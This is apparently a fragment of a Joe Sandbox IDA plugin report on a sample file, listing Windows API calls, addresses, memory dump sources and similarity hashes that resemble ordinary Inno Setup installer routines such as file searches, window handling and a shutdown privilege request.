                                                            • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                            • String ID: ,
                                                            • API String ID: 2266315723-3772416878
                                                            • Opcode ID: 6217f91ca86bc21168c1a31dc77beadf87db026dacfe8a4e2043101b83599555
                                                            • Instruction ID: f1655e9c1aaa1f9d3e17845697c0dfec8ab0781743990dff6cd0a114faef5a7c
                                                            • Opcode Fuzzy Hash: 6217f91ca86bc21168c1a31dc77beadf87db026dacfe8a4e2043101b83599555
                                                            • Instruction Fuzzy Hash: D6112B71505201AFDB00EF69C885F9B77E8AF49314F18067EBD58DB286D738D900CBA9
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000028), ref: 004555DF
                                                            • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555E5
                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 004555FE
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00455625
                                                            • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0045562A
                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 0045563B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                            • String ID: SeShutdownPrivilege
                                                            • API String ID: 107509674-3733053543
                                                            • Opcode ID: 905e5c4f0c040865ada5a790a5680192090f128290145b13f19b3701cccf3d3d
                                                            • Instruction ID: f0f78ca649e8ddc1473c2e21848b41e7847a09c75f53dffa28e6f5675cd8c776
                                                            • Opcode Fuzzy Hash: 905e5c4f0c040865ada5a790a5680192090f128290145b13f19b3701cccf3d3d
                                                            • Instruction Fuzzy Hash: 32F0F670284B42B9E610AA758C13F3B21C89B40B49F80083EBD09EA1C3D7BDC80C4A2F
                                                            APIs
                                                            • GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045D4F5
                                                            • GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045D505
                                                            • GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045D515
                                                            • ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047F47B,00000000,0047F4A4), ref: 0045D53A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$CryptVersion
                                                            • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                            • API String ID: 1951258720-508647305
                                                            • Opcode ID: 6323a5a980eb8feb456ca02504bfb6ad995229d531f09a6584140c28355fd360
                                                            • Instruction ID: 2c2546d05897d0e560449e180de6b9da44e6f0241588afb6de3da162f6531889
                                                            • Opcode Fuzzy Hash: 6323a5a980eb8feb456ca02504bfb6ad995229d531f09a6584140c28355fd360
                                                            • Instruction Fuzzy Hash: 3AF012F0940704EBEB18DFB6BCC67623695ABD531AF14C137A404A51A2E778044CCE1D
                                                            APIs
                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00497BB2,?,?,00000000,0049B628,?,00497D3C,00000000,00497D90,?,?,00000000,0049B628), ref: 00497ACB
                                                            • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 00497B4E
                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,00497B8A,?,00000000,?,00000000,00497BB2,?,?,00000000,0049B628,?,00497D3C,00000000), ref: 00497B66
                                                            • FindClose.KERNEL32(000000FF,00497B91,00497B8A,?,00000000,?,00000000,00497BB2,?,?,00000000,0049B628,?,00497D3C,00000000,00497D90), ref: 00497B84
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: FileFind$AttributesCloseFirstNext
                                                            • String ID: isRS-$isRS-???.tmp
                                                            • API String ID: 134685335-3422211394
                                                            • Opcode ID: ba647548f34564e7f56f6c808fa7faec3af05a969934c2433d5159a38f0bbcda
                                                            • Instruction ID: b2847bb1a44685988a55541ee7ac685ebeb66ffb5e30493f66813578f7a68db2
                                                            • Opcode Fuzzy Hash: ba647548f34564e7f56f6c808fa7faec3af05a969934c2433d5159a38f0bbcda
                                                            • Instruction Fuzzy Hash: A63165719146186FCF10EF65CC41ADEBBBCDB45318F5084F7A808A32A1E638AE458F58
                                                            APIs
                                                            • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457449
                                                            • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457470
                                                            • SetForegroundWindow.USER32(?), ref: 00457481
                                                            • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,0045775B,?,00000000,00457797), ref: 00457746
                                                            Strings
                                                            • Cannot evaluate variable because [Code] isn't running yet, xrefs: 004575C6
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                            • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                            • API String ID: 2236967946-3182603685
                                                            • Opcode ID: fe95ac23089f8abddac86e3d9ae11b4981b9e88786854755ce7e63a50dbcddc8
                                                            • Instruction ID: 5bc10c0d354cae83c82450a0913647aad13fd3ad71d4eb48676ad76960377df7
                                                            • Opcode Fuzzy Hash: fe95ac23089f8abddac86e3d9ae11b4981b9e88786854755ce7e63a50dbcddc8
                                                            • Instruction Fuzzy Hash: D9910034608204EFD715CF54E991F5ABBF9EB89305F2180BAED0897792D638AE04DF58
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455F37), ref: 00455E28
                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00455E2E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc
                                                            • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                            • API String ID: 1646373207-3712701948
                                                            • Opcode ID: b5f149e20a31f3d313834126475bcf244ddb8ed42aa7b007c000aa6233a22d25
                                                            • Instruction ID: 12dfdd1b414f9b5fa57bb507e68127e36b1c1a940f154b23c6ee37fdedd7ee09
                                                            • Opcode Fuzzy Hash: b5f149e20a31f3d313834126475bcf244ddb8ed42aa7b007c000aa6233a22d25
                                                            • Instruction Fuzzy Hash: 66415171A04649AFCF01EFA5C8929EFB7B8EF49304F508566F800F7252D6785E09CB69
                                                            APIs
                                                            • IsIconic.USER32(?), ref: 00417D1F
                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
                                                            • GetWindowPlacement.USER32(?,0000002C), ref: 00417D73
                                                            • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D9A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Window$Placement$Iconic
                                                            • String ID: ,
                                                            • API String ID: 568898626-3772416878
                                                            • Opcode ID: 419626ddcb93f619c016e5eb608395eb97e33a9638738bd346f5ce49c9230b00
                                                            • Instruction ID: 117db6d3727d0f94901dea8748b8d47281c3d2add8a8e77c7f929e434730b1f7
                                                            • Opcode Fuzzy Hash: 419626ddcb93f619c016e5eb608395eb97e33a9638738bd346f5ce49c9230b00
                                                            • Instruction Fuzzy Hash: 41213171604208ABCF40EF69E8C0EEA77B8AF49314F05456AFD18DF246C678DD84CB68
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001,00000000,00464205), ref: 00464079
                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,004641D8,?,00000001,00000000,00464205), ref: 00464108
                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,004641BA,?,00000000,?,00000000,004641D8,?,00000001,00000000,00464205), ref: 0046419A
                                                            • FindClose.KERNEL32(000000FF,004641C1,004641BA,?,00000000,?,00000000,004641D8,?,00000001,00000000,00464205), ref: 004641B4
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Find$File$CloseErrorFirstModeNext
                                                            • String ID:
                                                            • API String ID: 4011626565-0
                                                            • Opcode ID: ae980c7907389dfafffe65f94222ffd443bde6570b10391f97ae33023227fa5d
                                                            • Instruction ID: 2652c2d8e8669354d55d474f1d59e7b06630ff05c6329d0403030a32038cf055
                                                            • Opcode Fuzzy Hash: ae980c7907389dfafffe65f94222ffd443bde6570b10391f97ae33023227fa5d
                                                            • Instruction Fuzzy Hash: 1E418770A00618AFCF10EF65DC55ADEB7B8EB89705F5044BAF804E7381E67C9E848E59
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001,00000000,004646AB), ref: 00464539
                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00464676,?,00000001,00000000,004646AB), ref: 0046457F
                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,00464658,?,00000000,?,00000000,00464676,?,00000001,00000000,004646AB), ref: 00464634
                                                            • FindClose.KERNEL32(000000FF,0046465F,00464658,?,00000000,?,00000000,00464676,?,00000001,00000000,004646AB), ref: 00464652
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Find$File$CloseErrorFirstModeNext
                                                            • String ID:
                                                            • API String ID: 4011626565-0
                                                            • Opcode ID: 8a1b155a3f91a4aa9fbf35308e738363c59e35d7d54ec670dc4b6b29b87b573a
                                                            • Instruction ID: 7635123f594c8b6db569002a9bb01bf8fa96c74c2cf80da52efac59b167f1e7c
                                                            • Opcode Fuzzy Hash: 8a1b155a3f91a4aa9fbf35308e738363c59e35d7d54ec670dc4b6b29b87b573a
                                                            • Instruction Fuzzy Hash: D8416171A00A18EBCB10EFA5CC959DEB7B9EB88305F4044AAF804A7351E77C9E448E59
                                                            APIs
                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F2B,00000000,00452F4C), ref: 0042E966
                                                            • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E991
                                                            • GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F2B,00000000,00452F4C), ref: 0042E99E
                                                            • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F2B,00000000,00452F4C), ref: 0042E9A6
                                                            • SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F2B,00000000,00452F4C), ref: 0042E9AC
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                            • String ID:
                                                            • API String ID: 1177325624-0
                                                            • Opcode ID: db388d08dfb8c48f2ab297580a8778080e815d8e8b0b37ff587e49df53ef3670
                                                            • Instruction ID: 40e29ed62a0e901db822078ff48c294e58af048427126d47a83bbc7ee0829aa9
                                                            • Opcode Fuzzy Hash: db388d08dfb8c48f2ab297580a8778080e815d8e8b0b37ff587e49df53ef3670
                                                            • Instruction Fuzzy Hash: 4BF090B23A17207AF620B57A6C86F7F418CC785B68F10823BBB04FF1C1D9A85D05556D
                                                            APIs
                                                            • IsIconic.USER32(?), ref: 004833FA
                                                            • GetWindowLongA.USER32(00000000,000000F0), ref: 00483418
                                                            • ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049C0A4,004828DE,00482912,00000000,00482932,?,?,?,0049C0A4), ref: 0048343A
                                                            • ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049C0A4,004828DE,00482912,00000000,00482932,?,?,?,0049C0A4), ref: 0048344E
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Window$Show$IconicLong
                                                            • String ID:
                                                            • API String ID: 2754861897-0
                                                            • Opcode ID: 26f2524beb83a1697fb2f3c3d4c3f5548a09f48141019de32dcd2365822c4b68
                                                            • Instruction ID: 9902e76ed030cf172564c6423cfc444f456bf65fce7539c2ce1f68efba32f602
                                                            • Opcode Fuzzy Hash: 26f2524beb83a1697fb2f3c3d4c3f5548a09f48141019de32dcd2365822c4b68
                                                            • Instruction Fuzzy Hash: 4D017134A452019EEB11BBA5DD8AB5B27C45F10B09F08083BB9029F2A3CB6D9D41D71C
                                                            APIs
                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00462B90), ref: 00462B14
                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,00462B70,?,00000000,?,00000000,00462B90), ref: 00462B50
                                                            • FindClose.KERNEL32(000000FF,00462B77,00462B70,?,00000000,?,00000000,00462B90), ref: 00462B6A
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNext
                                                            • String ID:
                                                            • API String ID: 3541575487-0
                                                            • Opcode ID: f304b7e405ec9403326d096206e821460da1cdcff9736e6297f3d959ba5c8769
                                                            • Instruction ID: 0f193a6fcf1d943c675bf75123405c31ceeb2ecab595186adb6c93933d2a98b0
                                                            • Opcode Fuzzy Hash: f304b7e405ec9403326d096206e821460da1cdcff9736e6297f3d959ba5c8769
                                                            • Instruction Fuzzy Hash: 7121D871904B087EDB11DF65CC51ADEBBACDB49704F5084F7E808E31A1E6BCAE44CA5A
                                                            APIs
                                                            • IsIconic.USER32(?), ref: 004241F4
                                                            • SetActiveWindow.USER32(?,?,?,0046CFFB), ref: 00424201
                                                              • Part of subcall function 0042365C: ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                              • Part of subcall function 00423B24: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,021725AC,0042421A,?,?,?,0046CFFB), ref: 00423B5F
                                                            • SetFocus.USER32(00000000,?,?,?,0046CFFB), ref: 0042422E
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Window$ActiveFocusIconicShow
                                                            • String ID:
                                                            • API String ID: 649377781-0
                                                            • Opcode ID: 362a53b09b72621cbce2071a633a460a23dddc7e90100e91eac1f534d9fc78be
                                                            • Instruction ID: 85e094fd83fda52d6ba69bb43f194f943737e29f022f28d5c3d7585fd8a6de7d
                                                            • Opcode Fuzzy Hash: 362a53b09b72621cbce2071a633a460a23dddc7e90100e91eac1f534d9fc78be
                                                            • Instruction Fuzzy Hash: ECF03A717001208BDB10EFAAA8C4B9662A8EF48344B5500BBBC09DF34BCA7CDC0187A8
                                                            APIs
                                                            • IsIconic.USER32(?), ref: 00417D1F
                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
                                                            • GetWindowPlacement.USER32(?,0000002C), ref: 00417D73
                                                            • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D9A
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Window$Placement$Iconic
                                                            • String ID:
                                                            • API String ID: 568898626-0
                                                            • Opcode ID: e9f294a83204c688928c4c422749f875b3ddc518ff0edd6358ab4a317cb2701d
                                                            • Instruction ID: b3485382f52430a3de90e88073d2477855dbbaeb9eeee9907b508ce44eeb6dab
                                                            • Opcode Fuzzy Hash: e9f294a83204c688928c4c422749f875b3ddc518ff0edd6358ab4a317cb2701d
                                                            • Instruction Fuzzy Hash: 02017C31204108ABDB10EE69E8C1EEA73A8AF45324F054567FD08CF242D639ECC087A8
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CaptureIconic
                                                            • String ID:
                                                            • API String ID: 2277910766-0
                                                            • Opcode ID: 9fb93b599f870259b4000da7575617f39aed9b1e5bccbb5d02bb51a51f71ab84
                                                            • Instruction ID: edcb67aebd7cb7e0e4c3241a821d6ac110e093164443c601d5aebb18a23c44a8
                                                            • Opcode Fuzzy Hash: 9fb93b599f870259b4000da7575617f39aed9b1e5bccbb5d02bb51a51f71ab84
                                                            • Instruction Fuzzy Hash: A2F04F32304A028BDB21A72EC885AEB62F5DF84368B14443FE415CB765EB7CDCD58758
                                                            APIs
                                                            • IsIconic.USER32(?), ref: 004241AB
                                                              • Part of subcall function 00423A94: EnumWindows.USER32(00423A2C), ref: 00423AB8
                                                              • Part of subcall function 00423A94: GetWindow.USER32(?,00000003), ref: 00423ACD
                                                              • Part of subcall function 00423A94: GetWindowLongA.USER32(?,000000EC), ref: 00423ADC
                                                              • Part of subcall function 00423A94: SetWindowPos.USER32(00000000,lAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241BB,?,?,00423D83), ref: 00423B12
                                                            • SetActiveWindow.USER32(?,?,?,00423D83,00000000,0042416C), ref: 004241BF
                                                              • Part of subcall function 0042365C: ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Window$ActiveEnumIconicLongShowWindows
                                                            • String ID:
                                                            • API String ID: 2671590913-0
                                                            • Opcode ID: dcd3cf20cd52624e3855be4655b1b3d00803fdb590b5af4931fd0619bf418583
                                                            • Instruction ID: ffd443eaca36288e12b0fd3e34cf0737071334a0f5e631569de285e60205db71
                                                            • Opcode Fuzzy Hash: dcd3cf20cd52624e3855be4655b1b3d00803fdb590b5af4931fd0619bf418583
                                                            • Instruction Fuzzy Hash: 02E0E5A470010187EF00EFAAD8C9B9662A9AB48304F55057ABC08CF24BDA78C954C724
                                                            APIs
                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127E5), ref: 004127D3
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
